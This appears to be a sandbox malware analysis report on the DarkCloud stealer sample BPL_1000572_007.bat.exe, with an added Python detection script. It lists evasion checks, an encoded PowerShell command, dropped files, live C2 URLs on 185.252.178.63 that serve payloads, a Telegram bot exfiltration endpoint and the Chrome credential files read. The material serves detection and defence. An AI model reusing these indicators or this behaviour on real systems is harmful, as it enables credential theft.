                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.21.drBinary or memory string: VMware
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.444162317.0000000000DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                  Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
                  Source: Amcache.hve.21.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                  Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
                  Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.21.drBinary or memory string: VMware7,1
                  Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmtools
                  Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.me
                  Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                  Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess queried: DebugPort (2 occurrences)
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: Base64 decoded Start-Sleep -Seconds 50 (2 occurrences)
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeMemory written: C:\Users\user\Desktop\BPL_1000572_007.bat.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Users\user\Desktop\BPL_1000572_007.bat.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeQueries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeQueries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
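The two "File opened" rows above are the concrete evidence behind the "Tries to harvest and steal browser information" signature: the sample, not a browser, reads Chrome's Login Data and Web Data stores. Added example, not part of the Joe Sandbox report: Python detection logic that correlates that behaviour with the other host indicators in this report (a public IP lookup via showip.net, PE files dropped under the user's AppData tree, contact with 185.252.178.63) over simplified Sysmon-style event dicts. PIDs and paths are reused from the report; the event shape, the browser allow-list and the severity rules are assumptions made for the example.

```python
import re
from collections import defaultdict

# Indicators taken from the report above (paths compared lower-cased).
CRED_STORES = (r"\google\chrome\user data\default\login data",
               r"\google\chrome\user data\default\web data")
IP_CHECK_HOSTS = {"showip.net"}
C2_IPS = {"185.252.178.63"}
# Assumption: these images are the legitimate readers of Chrome's credential stores.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
# Any .exe written below <user>\AppData\Roaming or \Local (covers note\pdf.exe,
# Templates\fireless.exe and Temp\Wthdlxoyqvnqsfcfiinf.exe from the report).
APPDATA_PE = re.compile(r"\\users\\[^\\]+\\appdata\\(roaming|local)\\.*\.exe$", re.I)

def image_name(path):
    """File name of an image path, lower-cased ('' when the image is unknown)."""
    return (path or "").rsplit("\\", 1)[-1].lower()

def correlate(events):
    """Group events by PID and collect the behaviour signals each process exhibits."""
    state = defaultdict(lambda: {"image": None, "signals": set()})
    for ev in events:
        rec = state[ev["pid"]]
        kind = ev["type"]
        if kind == "process_create":
            rec["image"] = ev["image"]
        elif kind == "file_open":
            # A process without a recorded image (no process_create seen) is treated as non-browser.
            if ev["path"].lower().endswith(CRED_STORES) and image_name(rec["image"]) not in BROWSERS:
                rec["signals"].add("browser_credential_store_read")
        elif kind == "file_create":
            if APPDATA_PE.search(ev["path"]):
                rec["signals"].add("pe_dropped_in_appdata")
        elif kind == "network_connect":
            if ev.get("host", "").lower() in IP_CHECK_HOSTS:
                rec["signals"].add("external_ip_lookup")
            if ev.get("dst_ip") in C2_IPS:
                rec["signals"].add("known_c2_ip")
    return {pid: rec for pid, rec in state.items() if rec["signals"]}

def severity(signals):
    """Credential-store access alone is 'medium'; with any second signal, or on any C2 contact, 'high'."""
    if "known_c2_ip" in signals or ("browser_credential_store_read" in signals and len(signals) > 1):
        return "high"
    if "browser_credential_store_read" in signals:
        return "medium"
    return "low"

def triage(events):
    """Return {pid: (image, severity, sorted signals)} for every process with at least one signal."""
    return {pid: (rec["image"], severity(rec["signals"]), sorted(rec["signals"]))
            for pid, rec in correlate(events).items()}

# Constructed sample telemetry modelled on the report's process tree (event dicts are invented).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 5820, "image": r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"},
    {"type": "file_create", "pid": 5820, "path": r"C:\Users\user\AppData\Roaming\note\pdf.exe"},
    {"type": "network_connect", "pid": 5820, "dst_ip": "185.252.178.63", "dst_port": 80},
    {"type": "process_create", "pid": 1952, "image": r"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"},
    {"type": "network_connect", "pid": 1952, "dst_ip": "162.55.60.2", "dst_port": 80, "host": "showip.net"},
    {"type": "file_open", "pid": 1952, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 1952, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"type": "file_create", "pid": 1952, "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"},
    # Benign control: the browser reading its own store must produce no signal.
    {"type": "process_create", "pid": 4242, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"type": "file_open", "pid": 4242, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for pid, (image, sev, signals) in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"PID {pid} {image}: {sev} {signals}")
```

Matching on the store path plus a non-browser image, rather than on the sample's file name or hash, is what makes this survive the renaming the dropper itself performs (pdf.exe, fireless.exe); the PID 5820 parent is caught by its C2 contact even though it never touches the credential stores itself.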

Remote Access Functionality

Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR
ATT&CK Matrix

Techniques with at least one signature hit, grouped by tactic; the figure in parentheses is the signature badge shown in the matrix cell, as extracted.

Execution: Windows Management Instrumentation (221); Command and Scripting Interpreter (2); PowerShell (1)
Persistence: Registry Run Keys / Startup Folder (11)
Privilege Escalation: Process Injection (111); Registry Run Keys / Startup Folder (11)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (11); Masquerading (1); Virtualization/Sandbox Evasion (51); Process Injection (111)
Credential Access: OS Credential Dumping (1); Input Capture (1)
Discovery: File and Directory Discovery (1); System Information Discovery (23); Security Software Discovery (341); Process Discovery (1); Virtualization/Sandbox Evasion (51); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (1)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (2)
No hits: Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact

The matrix's unhighlighted placeholder cells (e.g. Valid Accounts, Remote Services, Exfiltration Over Other Network Medium) carry no hits and are not listed.
Behavior Graph (ID: 708242; sample: BPL_1000572_007.bat.exe; start date: 23/09/2022; architecture: WINDOWS; score: 100). Numbers after a process name are the graph's per-node counters (created registry values and files) as extracted.

Start node signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Yara detected DarkCloud; 5 other signatures

BPL_1000572_007.bat.exe (16 8)
    Network: 185.252.178.63, ports 49707, 49709, 49710 (LVLT-10753US, Germany)
    Dropped: C:\Users\user\AppData\Roaming\note\pdf.exe (PE32); C:\Users\user\...\Wthdlxoyqvnqsfcfiinf.exe (PE32); C:\Users\user\...\pdf.exe:Zone.Identifier (ASCII); C:\Users\user\...\BPL_1000572_007.bat.exe.log (ASCII)
    Signatures: May check the online IP address of the machine; Encrypted powershell cmdline option found; Creates multiple autostart registry keys; 3 other signatures
    -> BPL_1000572_007.bat.exe (1 16)
        Network: showip.net 162.55.60.2, ports 49708, 80 (ACPCA, United States)
        Dropped: C:\Users\user\AppData\...\fireless.exe (PE32)
        Signatures: Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc)
    -> Wthdlxoyqvnqsfcfiinf.exe (14 2)
        Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        -> WerFault.exe (7)
    -> powershell.exe (16)
        -> conhost.exe
pdf.exe (14 2)
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
fireless.exe
pdf.exe (2)

Antivirus Detection

Initial Sample
Source | Detection | Scanner | Label
BPL_1000572_007.bat.exe | 100% | Joe Sandbox ML | -

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\note\pdf.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | 100% | Joe Sandbox ML | -

Unpacked PE Files
Source | Detection | Scanner | Label
0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.0.BPL_1000572_007.bat.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ | 0% | Avira URL Cloud | safe
http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png | 0% | Avira URL Cloud | safe
http://185.252.178.63 | 0% | Avira URL Cloud | safe
http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl | 0% | Avira URL Cloud | safe
http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp | 0% | Avira URL Cloud | safe
http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
showip.net | 162.55.60.2 | true | false | - | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp | true | Avira URL Cloud: safe | unknown
http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png | true | Avira URL Cloud: safe | unknown
http://showip.net/ | false | - | high

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi | BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ | BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://duckduckgo.com/ac/?q= | LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl | Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://api.telegram.org/bot | BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://showip.net/ | BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://185.252.178.63 | BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://unpkg.com/leaflet | BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://search.yahoo.com?fr=crmas_sfpf | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://www.newtonsoft.com/json | BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.21.dr | false | - | high
